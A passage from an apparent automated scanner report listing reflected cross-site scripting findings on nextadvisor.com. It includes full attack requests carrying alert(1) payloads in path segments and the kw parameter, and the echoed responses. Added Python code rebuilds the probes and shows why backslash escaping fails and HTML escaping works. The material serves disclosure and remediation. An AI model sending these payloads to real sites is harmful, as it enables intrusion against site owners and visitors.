Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nextadvisor.com

Response (redirected)

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 04:12:34 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Set-Cookie: PHPSESSID=e3ec558f338fee4db7b551cf98449cb9; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 23634


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.nextadvisor.com/images/blog_sidebar79021"><script>alert(1)</script>982aa0608fe/online_dating_sb.jpg.php" />
...[SNIP]...

5.56. http://www.nextadvisor.com/images/blog_sidebar/online_dating_sb.jpg [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nextadvisor.com
Path:   /images/blog_sidebar/online_dating_sb.jpg

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 6b593'><img%20src%3da%20onerror%3dalert(1)>2fa20870a22 was submitted in the REST URL parameter 2. This input was echoed as 6b593'><img src=a onerror=alert(1)>2fa20870a22 in the application's response.

This proof of concept shows that arbitrary JavaScript can be injected into the application's response. As with the internet_fax_sb.jpg path, the second path segment also reaches a navigation link whose href is enclosed in single quotes, so the payload uses a single quote to close the attribute value and the a tag, and an img element's onerror event handler then runs the JavaScript without any script tag.

Note that a redirection occurred between the attack request and the response containing the echoed input. The attack succeeds only if that redirection is followed, which a browser does automatically.

Request

GET /images/blog_sidebar6b593'><img%20src%3da%20onerror%3dalert(1)>2fa20870a22/online_dating_sb.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nextadvisor.com

Response (redirected)

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 04:12:54 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Set-Cookie: PHPSESSID=77f89f3390f07771db738fe244d7fef1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 23881


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<meta http-equiv="Conten
...[SNIP]...
<a href='/blog_sidebar6b593'><img src=a onerror=alert(1)>2fa20870a22/index.php' class='nav_select'>
...[SNIP]...

5.57. http://www.nextadvisor.com/images/blog_sidebar/online_dating_sb.jpg [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nextadvisor.com
Path:   /images/blog_sidebar/online_dating_sb.jpg

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6c41a"><script>alert(1)</script>349ece8baa9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /images/blog_sidebar/online_dating_sb.jpg6c41a"><script>alert(1)</script>349ece8baa9 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nextadvisor.com

Response (redirected)

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 04:14:09 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Set-Cookie: PHPSESSID=c9c4f40a3f3a57bfe5676297eebc1e47; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 23660


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.nextadvisor.com/images/blog_sidebar/online_dating_sb.jpg6c41a"><script>alert(1)</script>349ece8baa9.php" />
...[SNIP]...

5.58. http://www.nextadvisor.com/includes/javascript.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nextadvisor.com
Path:   /includes/javascript.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 793b4"><script>alert(1)</script>a2d9ab8e691 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /includes793b4"><script>alert(1)</script>a2d9ab8e691/javascript.php?script=http%3a%2f%2fsome-inexistent-website.acu%2fsome_inexistent_file_with_long_name HTTP/1.1
Host: www.nextadvisor.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=ca43057bfb377bbe8c129dafe1c6ec28; __utmz=252293142.1303613812.1.1.utmgclid=CJa0kuyTtKgCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=252293142.2039271104.1303613812.1303613812.1303613812.1; __utmc=252293142; __utmb=252293142.1.10.1303613812

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 04:10:11 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 11905


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.nextadvisor.com/includes793b4"><script>alert(1)</script>a2d9ab8e691/javascript.php" />
...[SNIP]...

5.59. http://www.nextadvisor.com/includes/javascript.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nextadvisor.com
Path:   /includes/javascript.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 9f7e3'><img%20src%3da%20onerror%3dalert(1)>9791e26f04a was submitted in the REST URL parameter 1. This input was echoed as 9f7e3'><img src=a onerror=alert(1)>9791e26f04a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /includes9f7e3'><img%20src%3da%20onerror%3dalert(1)>9791e26f04a/javascript.php?script=http%3a%2f%2fsome-inexistent-website.acu%2fsome_inexistent_file_with_long_name HTTP/1.1
Host: www.nextadvisor.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=ca43057bfb377bbe8c129dafe1c6ec28; __utmz=252293142.1303613812.1.1.utmgclid=CJa0kuyTtKgCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=252293142.2039271104.1303613812.1303613812.1303613812.1; __utmc=252293142; __utmb=252293142.1.10.1303613812

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 04:10:22 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 11944


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<meta http-equiv="Conten
...[SNIP]...
<a href='/includes9f7e3'><img src=a onerror=alert(1)>9791e26f04a/index.php' class='nav_select'>
...[SNIP]...

5.60. http://www.nextadvisor.com/includes/javascript.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nextadvisor.com
Path:   /includes/javascript.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 88492"><script>alert(1)</script>7ca6639f3e5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /includes/javascript.php88492"><script>alert(1)</script>7ca6639f3e5?script=http%3a%2f%2fsome-inexistent-website.acu%2fsome_inexistent_file_with_long_name HTTP/1.1
Host: www.nextadvisor.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=ca43057bfb377bbe8c129dafe1c6ec28; __utmz=252293142.1303613812.1.1.utmgclid=CJa0kuyTtKgCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=252293142.2039271104.1303613812.1303613812.1303613812.1; __utmc=252293142; __utmb=252293142.1.10.1303613812

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 04:11:02 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 11925


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.nextadvisor.com/includes/javascript.php88492"><script>alert(1)</script>7ca6639f3e5" />
...[SNIP]...
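
Findings 5.58 to 5.60 differ only in which path segment the marker was appended to and which quote character the payload has to close. The Python below is an added example, not the scanner's code and not part of this report: it rebuilds the mutated path for a given "REST URL parameter" index, wraps the payload in the same kind of prefix/suffix marker, and classifies where the echo lands in a response. The marker lengths are inferred from the requests above; sample_response() is a constructed stand-in for the real HTTP fetch, modelled on the canonical <link> and the nav <a href='...'> snippets shown in 5.59 and 5.60.

```python
"""Rebuild the 'REST URL parameter N' probes of findings 5.58-5.60 and classify
where the echo lands. Added example: not the scanner's code and not part of
the XSS.CX report. Marker lengths are inferred from the report; the response
is a constructed stand-in for a real GET."""
import re
import secrets

PAYLOAD_DQ = '"><script>alert(1)</script>'      # breaks out of a "..." attribute
PAYLOAD_SQ = "'><img src=a onerror=alert(1)>"   # breaks out of a '...' attribute


def split_segments(path):
    """'/includes/javascript.php' -> ['includes', 'javascript.php'];
    the report numbers these from 1 as 'REST URL parameter N'."""
    return [s for s in path.split('/') if s]


def inject_segment(path, index, marker):
    """Append marker to the index-th (1-based) segment, keeping a trailing
    slash, which is how the report's requests are built: /pmid/ with
    parameter 1 becomes /pmid<marker>/ (finding 5.64)."""
    segs = split_segments(path)
    if not 1 <= index <= len(segs):
        raise IndexError('%s has %d segments, no parameter %d' % (path, len(segs), index))
    segs[index - 1] += marker
    return '/' + '/'.join(segs) + ('/' if path.endswith('/') else '')


def make_marker(payload, prefix=None, suffix=None):
    """Surround the payload with random hex so the echo can be located
    unambiguously; fixed values may be passed for reproducible tests."""
    return (prefix or secrets.token_hex(3)[:5],
            payload,
            suffix or secrets.token_hex(6)[:11])


def reflection_contexts(body, prefix, suffix):
    """Every place prefix...suffix is echoed, with the context it landed in:
    'attr_dq' / 'attr_sq' for an open double/single-quoted attribute value,
    'tag' for elsewhere inside a tag, 'text' for character data. 'breakout'
    is True when the echo still holds the closing quote followed by '>',
    i.e. the attribute and the tag are terminated and what follows is parsed
    as new markup."""
    found = []
    pattern = re.escape(prefix) + r'(.*?)' + re.escape(suffix)
    for m in re.finditer(pattern, body, re.S):
        echoed = m.group(1)
        before = body[:m.start()]
        context = 'text'
        if before.rfind('<') > before.rfind('>'):             # inside a tag
            tag_text = before[before.rfind('<'):]
            q = re.search(r'=\s*(["\'])[^"\']*$', tag_text)  # unclosed attr value
            context = ('attr_dq' if q.group(1) == '"' else 'attr_sq') if q else 'tag'
        quote = {'attr_dq': '"', 'attr_sq': "'"}.get(context)
        found.append({'echoed': echoed, 'context': context,
                      'breakout': quote is not None and (quote + '>') in echoed})
    return found


def sample_response(path):
    """Constructed 404 page body modelled on the snippets in 5.59 and 5.60:
    a double-quoted canonical link and a single-quoted nav link, both built
    from the request path."""
    template = ('<html><head>\n'
                '<link rel="canonical" href="http://www.nextadvisor.com%s" />\n'
                '</head><body>\n'
                "<a href='%s' class='nav_select'>Home</a>\n"
                '</body></html>')
    return template % (path, path)


def probe(path, index, payload, prefix=None, suffix=None):
    """Mutate one path segment, 'fetch' the page and classify the echoes.
    A live re-test would replace sample_response() with an HTTP GET."""
    prefix, payload, suffix = make_marker(payload, prefix, suffix)
    mutated = inject_segment(path, index, prefix + payload + suffix)
    return mutated, reflection_contexts(sample_response(mutated), prefix, suffix)
```

The double-quote payload breaks out only at the canonical link and the single-quote payload only at the nav link, which is why the scanner lists two findings for the same parameter (5.58 and 5.59). The breakout test only checks that the closing quote and the '>' survive, which is what "echoed unmodified" means above; a backslash placed in front of the quote, as in 5.63 further down, would still pass it, because an HTML parser does not treat a backslash as an escape character.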

5.61. http://www.nextadvisor.com/link.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nextadvisor.com
Path:   /link.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1cce4"><script>alert(1)</script>1a534bed66f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /link.php1cce4"><script>alert(1)</script>1a534bed66f?kw=gid9a%20identity%20theft%20resource_ordering34&category=identitytheft&link=idtheftshield&id=227 HTTP/1.1
Host: www.nextadvisor.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=ca43057bfb377bbe8c129dafe1c6ec28; __utmz=252293142.1303613812.1.1.utmgclid=CJa0kuyTtKgCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=252293142.2039271104.1303613812.1303613812.1303613812.1; __utmc=252293142; __utmb=252293142.1.10.1303613812

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 03:27:19 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 11904


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.nextadvisor.com/link.php1cce4"><script>alert(1)</script>1a534bed66f" />
...[SNIP]...

5.62. http://www.nextadvisor.com/pmid [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nextadvisor.com
Path:   /pmid

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9ad9f"><script>alert(1)</script>0b406646753 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pmid9ad9f"><script>alert(1)</script>0b406646753?kw=id%20gid9a%20identity%20theft%20resource_ordering34--2011-04-23--20-10-01CD1 HTTP/1.1
Host: www.nextadvisor.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=ca43057bfb377bbe8c129dafe1c6ec28; __utmz=252293142.1303613812.1.1.utmgclid=CJa0kuyTtKgCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=252293142.2039271104.1303613812.1303613812.1303613812.1; __utmc=252293142; __utmb=252293142.1.10.1303613812

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 03:32:18 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 11896


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.nextadvisor.com/pmid9ad9f"><script>alert(1)</script>0b406646753" />
...[SNIP]...

5.63. http://www.nextadvisor.com/pmid [kw parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nextadvisor.com
Path:   /pmid

Issue detail

The value of the kw request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 49117"><script>alert(1)</script>f1090dfeda0 was submitted in the kw parameter. This input was echoed as 49117\"><script>alert(1)</script>f1090dfeda0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /pmid?kw=id%20gid9a%20identity%20theft%20resource_ordering34--2011-04-23--20-10-01CD149117"><script>alert(1)</script>f1090dfeda0 HTTP/1.1
Host: www.nextadvisor.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=ca43057bfb377bbe8c129dafe1c6ec28; __utmz=252293142.1303613812.1.1.utmgclid=CJa0kuyTtKgCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=252293142.2039271104.1303613812.1303613812.1303613812.1; __utmc=252293142; __utmb=252293142.1.10.1303613812

Response (redirected)

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:24:41 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 8853


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<input type="hidden" name="bcd" value="id%20gid9a%20identity%20theft%20resource_ordering34--2011-04-23--20-10-01CD149117\"><script>alert(1)</script>f1090dfeda0">
...[SNIP]...
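
The echo in 5.63 (and again in 5.66) is the one place in this report where the application did something to the input: the double quote came back as \" . That is backslash escaping of the kind PHP's addslashes() produces. It protects a quoted string in PHP or SQL, but an HTML parser does not treat a backslash as an escape, so the quote still closes the value attribute and the '>' still closes the tag. The Python below is an added example, not code from nextadvisor.com or from this report; that the site used addslashes() specifically is an assumption, and the rendered <input> tag is reconstructed from the response snippet above. It renders the hidden field with no escaping, with backslash escaping and with html.escape(), then parses each result with the standard library's HTML parser to see whether a real <script> element comes out.

```python
"""Why the backslash-escaped echo in findings 5.63 and 5.66 is still
exploitable. Added example, not code from nextadvisor.com or from the XSS.CX
report. That the server used PHP addslashes() is an assumption; the <input>
tag and the kw value are reconstructed from the response shown in 5.63."""
import html
from html.parser import HTMLParser

# Constructed from finding 5.63: the legitimate kw value and the marker.
KW_BASE = "id%20gid9a%20identity%20theft%20resource_ordering34--2011-04-23--20-10-01CD1"
MARKER = '49117"><script>alert(1)</script>f1090dfeda0'


def escape_none(value):
    """No neutralisation at all (the path reflections elsewhere in the report)."""
    return value


def escape_backslash(value):
    """Backslash-escape quotes and backslashes, as PHP addslashes() does.
    Right for a quoted PHP or SQL string literal, meaningless inside HTML."""
    return value.replace('\\', '\\\\').replace('"', '\\"').replace("'", "\\'")


def escape_html_attr(value):
    """Correct neutralisation for a double-quoted HTML attribute value:
    &quot; &#x27; &lt; &gt; &amp; cannot terminate the attribute or the tag."""
    return html.escape(value, quote=True)


def render_hidden_input(value, escaper):
    """Emit the <input type="hidden" name="bcd"> tag the 5.63 response shows."""
    return '<input type="hidden" name="bcd" value="%s">' % escaper(value)


class _Collector(HTMLParser):
    """Record the tags and the <input> attributes the browser would see."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.tags = []
        self.input_attrs = {}

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        if tag == 'input':
            self.input_attrs = dict(attrs)

    def handle_startendtag(self, tag, attrs):
        self.handle_starttag(tag, attrs)


def parse(markup):
    p = _Collector()
    p.feed(markup)
    p.close()
    return p


def script_injected(markup):
    """True when the payload became a real <script> element rather than text."""
    return 'script' in parse(markup).tags


def parsed_value(markup):
    """The value a browser would submit for the hidden field (None if lost)."""
    return parse(markup).input_attrs.get('value')


def demo():
    """For each escaper: (did a <script> element appear?, did the original
    value survive the round trip through the parser?)."""
    original = KW_BASE + MARKER
    results = {}
    for name, esc in (('none', escape_none),
                      ('backslash', escape_backslash),
                      ('html', escape_html_attr)):
        markup = render_hidden_input(original, esc)
        results[name] = (script_injected(markup), parsed_value(markup) == original)
    return results
```

Only the html.escape() rendering both keeps the <script> out of the document and round-trips the full kw value into the field; the backslash rendering does neither, which is why the scanner still rates 5.63 and 5.66 as Certain. The same fix applies to the path reflections earlier in the report: the canonical href and the nav links need html.escape(path, quote=True) at the point of output, or better, a URL assembled from the application's own route table rather than from the raw request URI.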

5.64. http://www.nextadvisor.com/pmid/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nextadvisor.com
Path:   /pmid/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80329"><script>alert(1)</script>4aaae51729d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pmid80329"><script>alert(1)</script>4aaae51729d/?kw=id%2520gid9a%2520identity%2520theft%2520resource_ordering34--2011-04-23--20-10-01CD1 HTTP/1.1
Host: www.nextadvisor.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=ca43057bfb377bbe8c129dafe1c6ec28; __utmz=252293142.1303613812.1.1.utmgclid=CJa0kuyTtKgCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=252293142.2039271104.1303613812.1303613812.1303613812.1; __utmc=252293142; __utmb=252293142.1.10.1303613812

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 03:18:49 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 11887


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.nextadvisor.com/pmid80329"><script>alert(1)</script>4aaae51729d/" />
...[SNIP]...

5.65. http://www.nextadvisor.com/pmid/ [REST URL parameter 1]

Summary

Severity:   High
